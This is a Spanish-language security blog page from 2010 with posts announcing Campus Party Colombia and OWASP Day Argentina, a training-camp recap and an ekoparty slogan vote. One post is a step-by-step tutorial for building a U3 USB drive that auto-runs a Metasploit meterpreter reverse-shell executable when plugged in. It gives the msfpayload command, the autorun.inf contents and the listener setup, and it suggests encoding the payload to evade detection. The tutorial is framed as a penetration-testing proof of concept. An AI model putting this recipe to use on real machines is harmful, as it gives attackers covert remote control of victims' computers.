viernes, 25 de junio de 2010

Ya llega la Campus Party COLOMBIA!

El próximo Lunes, y durante 7 días seguidos, más de 4000 geeks se van a reunir en el mayor evento de innovación, tecnología y ocio digital del mundo.


Desde 1997 se realiza la Campus Party en España, uno de los eventos tecnológicos más grandes del mundo. Casi 11 años después, la Campus Party se vuelve internacional, y ahora también encontramos ediciones en México, Brasil y Colombia.

Para los que no tenemos una Campus Party en nuestro país, nos cuesta mucho imaginarnos la magnitud de este evento, por lo que mi ansiedad por participar de mi primera Campus Party es enorme! ;)

Una de las novedades de este año, es el área de "Seguridad y Redes", donde podemos encontrar charlas muy interesantes:

RETO:
- Análisis Forense

CONFERENCIA:
- BioHacking: Hackeándonos a nosotros mismos
- Botnets conformadas por dispositivos móviles: Una amenaza global
- ISO 27001 - Metodologías ágiles para creación de planes y políticas de seguridad
- ENDIAN - una opción free de seguridad perimetral
- What Works on Client Side Pentesting

TALLER:
- Wireshark, ataque y contramedidas arp-spoofing usando ettercap y arpwatch
- Comunicaciones Unificadas con Software Libre

CHARLA:
- Creación de Honeynet para dar a luz perfiles de atacantes
- Estado actual del Hacking en RFID
- Negligencia o Desconocimiento
- Redes Mesh Comunitarias
- IPsec las redes del futuro cercano

El Miércoles 30 a las 14hs, voy a dar mi charla "What Works On Client Side Pentesting", y el Jueves 1 a las 10hs, voy a dictar el "Client Side Pentesting Workshop".

Estoy muy feliz de volver a Colombia, un país hermoso, con gente increíble, que ya lo voy sintiendo como mi segundo hogar en el mundo :) Saludos a todos mis amigos colombianos!

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

domingo, 20 de junio de 2010

Se viene el OWASP DAY Argentina

OWASP Argentina junto a la Facultad de Ingeniería de la UBA organiza las primeras Jornadas de Seguridad WEB, OWASP DAY Argentina.


Estas jornadas tendrán lugar el Miércoles 30 de Junio de 13:00 a 18:30 hs, en la Facultad de Ingeniería de la UBA - Salón del Consejo, en Paseo Colon 850.

La agenda de las charlas es la siguiente:


La entrada es libre y gratuita, aunque solo hay vacantes para 100 personas.  Pueden registrarse desde aquí:


Más información sobre el OWASP DAY Argentina:


Espero que puedan asistir, ya que hay excelentes expositores!

miércoles, 16 de junio de 2010

Ataque USB U3 con MetaSploit

En 4 simples pasos vamos a armar un USB U3, para que al ser conectado a una PC, realice una conexión reversa con meterpreter.

La idea es generar con MetaSploit un ejecutable con un payload que genere una conexión reversa al conectar el USB a la PC. Para grabar el payload dentro del U3, vamos a utilizar el programa Universal Customizer.


1. Generamos el Payload con MetaSploit

En este caso vamos a crear un ejecutable con una conexión reversa de meterpreter:

./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > malware.exe

Por supuesto que podemos utilizar cualquier otro payload, como también encodearlo para que sea más difícil su detección.


2. Creamos nuestra ISO

Una vez que bajamos y descomprimimos Universal Customizer, copiamos malware.exe al directorio "U3CUSTOM" y creamos el archivo "autorun.inf" con el siguiente contenido:

[AutoRun]
open=malware.exe

Luego ejecutamos "ISOCreate.cmd" y dentro del directorio "BIN" se va a crear nuestra ISO con el nombre "U3CUSTOM.ISO". Si no creamos nuestra ISO, Universal Customizer va a utilizar la "U3CUSTOM.ISO" que ya viene dentro del paquete, con una versión de Hacksaw.


3. Grabamos la ISO

Luego corremos Universal Customizer y vamos siguiendo los pasos:


Al finalizar, quitamos el USB y cuando lo volvamos a conectar ya tendrá nuestro payload adentro.


4. Escuchamos por la Conexión Reversa

Para finalizar, debemos dejar un listener escuchando por la conexión reversa del payload que grabamos en el U3:

./msfconsole
use exploit/multi/handler
set PAYLAOD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 443
set ExitOnSession false
exploit -j

Eso es todo, una interesante prueba de concepto para probar la seguridad de la PC de un usuario.

LINKS RELACIONADOS:
- Ataques USB con tecnología U3 por Rafael Montero
- USB Keys & Metasploit for fun and profit
- Sallis Usb Hacks
- Universal Customizer

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

lunes, 14 de junio de 2010

Los Reyes Del Sable

Se celebró una nueva edición del COMBAT Training 2.0 en Buenos Aires, con un numeroso grupo de ninjas, y muchas anécdotas que quedaron de esta agitada semana que compartimos juntos.

Arriba de izquierda a derecha, Jerónimo, (yo), Esteban, Fernando, Mariano, Ulises y Gonzalo, abajo Tomás, Nicolás, Mariano y Alfonso. Faltan en la foto, Martín, Roberto e Iván.


Como siempre en el COMBAT Training, al principio nadie muestra demasiado espíritu por la competencia, pero a medida que van pasando los días va creciendo el lujurioso deseo de llevarse la katana... }:-)

En un hecho insólito para el COMBAT Training, hubo un empate en el primer lugar entre Ulises Retamal y Tomás Corrado, por lo que ambos fueron declarados ganadores. La katana se la llevo Ulises, en un acto altamente elogiable de Tomás, quien decidió cederla a su compañero.

Entre denuncias de fraude y complots, empataron en segundo lugar Esteban Brizuela y Gonzalo Depurré, este último quién nos volviera locos con un botón que repetía la frase "así de fácil!" y que por supuesto siempre era presionado en el momento oportuno ;-)


Otro que dio la nota fue Nicolás, el responsable de rebautizar a la katana como "el sable", y a causa de esto apodado por sus compañeros, con mucha malicia debo decir, como "el rey del sable".


Le faltó muy poco a Nicolás para poner sus manos sobre "el sable", pero igualmente Ulises ofreció prestárselo todas las veces que sea necesario.

Exclusivamente para esta edición, junto a la camiseta oficial del COMBAT Training, todos los asistentes también se llevaron una camiseta de la selección argentina, como para estar acorde al espíritu mundialista!

De parte mía y de Jerónimo, les mando un abrazo a los 12 ninjas con los que compartimos estos 5 días de training. :)

martes, 1 de junio de 2010

VOTA el SLOGAN de la ekoparty 2010!

Ya se encuentra abierta la votación pública para seleccionar cual será el slogan que estará impreso en todo el merchandising de la ekoparty. Vota Ya!


No te quedes afuera, y participa de la elección del slogan que nos va a representar en la ekoparty 2010!

LinkWithin